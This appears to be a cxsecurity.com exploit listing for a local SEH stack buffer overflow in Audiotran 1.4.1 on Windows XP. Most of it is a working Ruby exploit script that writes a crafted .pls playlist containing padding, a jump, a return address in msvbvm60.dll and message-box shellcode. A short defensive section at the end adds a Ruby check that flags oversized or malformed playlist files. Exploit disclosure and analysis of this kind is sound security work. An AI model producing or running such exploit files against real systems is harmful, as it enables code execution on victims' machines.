Audiotran 1.4.1 Win XP SP2/SP3 English buffer overflow

2010-01-11 / 2010-01-12
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/ruby
#
# Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
# Date          : January 9th, 2010
# Author        : Sébastien Duquette
# Software Link : http://www.e-soft.co.uk/Audiotran.htm
# Version       : 1.4.1
# OS            : Windows
# Tested on     : XP SP2/SP3 En (VMware)
# Type of vuln  : Stack Overflow / SEH
# Greetz to     : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
#
banner = "|------------------------------------------------------------------|\n" +
"| __ __ |\n" +
"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n" +
"| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n" +
"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n" +
"| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n" +
"| |\n" +
"| http://www.corelan.be:8800 |\n" +
"| |\n" +
"|-------------------------------------------------[ EIP Hunters ]--|\n\n"

# Corelan Team MsgBox
payload =
"\xeb\x22\x56\x31\xc0\x64\x8b\x40\x30\x85\xc0\x78" +
"\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb" +
"\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x5e\xc3" +
"\xeb\x69\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54" +
"\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb" +
"\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" +
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +
"\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb" +
"\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b" +
"\x01\xe8\x89\x44\x24\x1c\x61\xc3\xad\x50\x52\xe8" +
"\xaa\xff\xff\xff\x89\x07\x44\x44\x44\x44\x44\x44" +
"\x44\x44\x47\x47\x47\x47\x39\xce\x75\xe6\xc3\x4c" +
"\x4c\x4c\x4c\x89\xe5\xe8\x68\xff\xff\xff\x89\xc2" +
"\xeb\x1c\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8" +
"\xc8\xff\xff\xff\xeb\x15\x31\xd2\x59\x88\x51\x36" +
"\x51\x52\xff\x54\x24\x0c\xe8\xdf\xff\xff\xff\x57" +
"\x7f\x29\x62\xe8\xe6\xff\xff\xff\x43\x6f\x72\x65" +
"\x6c\x61\x6e\x20\x54\x65\x61\x6d\x20\x53\x68\x65" +
"\x6c\x6c\x63\x6f\x64\x65\x20\x2d\x20\x50\x72\x6f" +
"\x67\x72\x61\x6d\x20\x65\x78\x70\x6c\x6f\x69\x74" +
"\x65\x64\x20\x73\x75\x63\x65\x73\x73\x66\x75\x6c" +
"\x6c\x79\x58"

print banner
puts "[+] Exploit for Audiotran 1.4.1."

filename = "audiotran_poc.pls"
f = File.new(filename, 'w')
f.write 'A' * 1308 # padding
f.write "\xeb\x06\x90\x90"
f.write "\xcb\x75\x52\x73" # ret at 0x735275CB [msvbvm60.dll]
f.write payload
f.write 'A' * 9000 # padding
f.close
puts "[+] Wrote exploit file : #{filename}."
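
From the defender's side, the file this script writes is easy to tell apart from a real playlist: it is a single line of more than 10,000 bytes with no `[playlist]` header. The following triage check is an added example, not part of the original script or of Audiotran; `pls_findings`, the two thresholds and both sample inputs are assumptions constructed for illustration.

```ruby
# Added example (not from the original page): static triage of a .pls file.
# MAX_LINE and MAX_RUN are assumed thresholds, not values from any standard.
MAX_LINE = 1024   # longest line accepted in a playlist
MAX_RUN  = 256    # longest run of one repeated byte accepted

# Returns an array of finding strings; an empty array means nothing was flagged.
def pls_findings(data)
  lines = data.b.each_line.map(&:chomp)   # work on raw bytes, not characters
  findings = []

  # A well-formed playlist starts with the [playlist] section header.
  first = lines.find { |l| !l.strip.empty? }
  unless first && first.strip.downcase == "[playlist]"
    findings << "missing [playlist] header"
  end

  lines.each_with_index do |line, i|
    n = i + 1
    if line.bytesize > MAX_LINE
      findings << "line #{n}: #{line.bytesize} bytes (limit #{MAX_LINE})"
    end
    # Control bytes other than TAB have no place in a text playlist.
    ctrl = line.bytes.count { |b| b < 0x20 && b != 0x09 }
    findings << "line #{n}: #{ctrl} control byte(s)" if ctrl > 0
    # Long filler runs are typical of overflow padding.
    if line =~ /(.)\1{#{MAX_RUN - 1},}/
      findings << "line #{n}: run of #{MAX_RUN}+ identical bytes"
    end
  end
  findings
end

# Constructed samples: a normal playlist, and a harmless file that only mimics
# the layout the script above writes (long filler, a few raw bytes, more filler).
GOOD = "[playlist]\r\nFile1=http://example.invalid/a.mp3\r\nTitle1=Demo\r\n" \
       "Length1=-1\r\nNumberOfEntries=1\r\nVersion=2\r\n"
BAD  = "A" * 1308 + "\x00\x01\xFE\xFF".b + "B" * 9000

if __FILE__ == $0
  { "good.pls" => GOOD, "bad.pls" => BAD }.each do |name, data|
    f = pls_findings(data)
    puts "#{name}: #{f.empty? ? 'clean' : f.join('; ')}"
  end
end
```

Such a check suits mail or download gateways and file-share sweeps; it does not replace removing or updating the vulnerable player.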


Copyright 2024, cxsecurity.com

 
